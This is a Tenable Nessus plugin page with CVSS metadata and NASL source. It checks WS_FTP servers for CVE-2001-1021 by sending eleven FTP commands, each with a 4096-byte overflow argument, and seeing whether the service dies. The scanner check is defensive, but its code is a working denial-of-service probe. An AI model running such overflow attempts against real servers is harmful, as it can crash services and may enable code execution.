WS_FTP Multiple Command Long Argument Overflow

2002-08-2100:00:00

www.tenable.com

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.768

Percentile

98.2%

JSON

It is possible to shut down the remote FTP server by issuing a command followed by a too long argument.

An attacker may use this flow to prevent your site from sharing some resources with the rest of the world, or even execute arbitrary code on your system.

#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(11094);
 script_version ("1.22");
 script_cve_id("CVE-2001-1021");

 script_name(english:"WS_FTP Multiple Command Long Argument Overflow");
 
 script_set_attribute(attribute:"synopsis", value:
"It is possible to crash the remote FTP server." );
 script_set_attribute(attribute:"description", value:
"It is possible to shut down the remote FTP server by issuing
a command followed by a too long argument.

An attacker may use this flow to prevent your site from 
sharing some resources with the rest of the world, or even
execute arbitrary code on your system." );
 script_set_attribute(attribute:"solution", value:
"Upgrade to the latest version your FTP server." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");


 script_set_attribute(attribute:"plugin_publication_date", value: "2002/08/21");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/07/26");
 script_cvs_date("Date: 2018/08/15 16:35:43");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
 summary["english"] = "Attempts a buffer overflow on many commands";
 script_summary(english:summary["english"]);
 
 script_category(ACT_DENIAL);
 
 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
 script_family(english:"FTP");
 script_dependencie("ftp_anonymous.nasl", "ftpserver_detect_type_nd_version.nasl");
 script_require_ports("Services/ftp", 21);
 exit(0);
}

#

include("audit.inc");
include("global_settings.inc");
include ("misc_func.inc");
include ("ftp_func.inc");


port = get_ftp_port(default: 21);

login = get_kb_item("ftp/login");
password = get_kb_item("ftp/password");

if (supplied_logins_only && (isnull(login) || isnull(password)))
  audit(AUDIT_SUPPLIED_LOGINS_ONLY);

if(!login) login = "ftp";
if (! password) password = "[email protected]";

soc = open_sock_tcp(port);
if(! soc) exit(1);
if(! ftp_authenticate(socket:soc, user:login, pass:password))
{
  ftp_close(socket: soc);
  exit(0);
}

cmd[0] = "DELE";
cmd[1] = "MDTM";
cmd[2] = "MLST";
cmd[3] = "MKD";
cmd[4] = "RMD";
cmd[5] = "RNFR";
cmd[6] = "RNTO";
cmd[7] = "SIZE";
cmd[8] = "STAT";
cmd[9] = "XMKD";
cmd[10] = "XRMD ";

pb=0;
for (i=0; i<11; i=i+1)
{
  s = strcat(cmd[i], " /", crap(4096), '\r\n');
  send(socket:soc, data:s);
  r = recv_line(socket:soc, length:1024);
  #if(!r) pb=pb+1;
  ftp_close(socket: soc);
 
  soc = open_sock_tcp(port);
  if (! soc)
  {
   if (service_is_dead(port: port) <= 0)
     exit(1, "Could not reconnect to port "+port+".");
   security_hole(port);
   exit(0);
  }
  ftp_authenticate(socket:soc, user:login, pass:password);
}

ftp_close(socket: soc);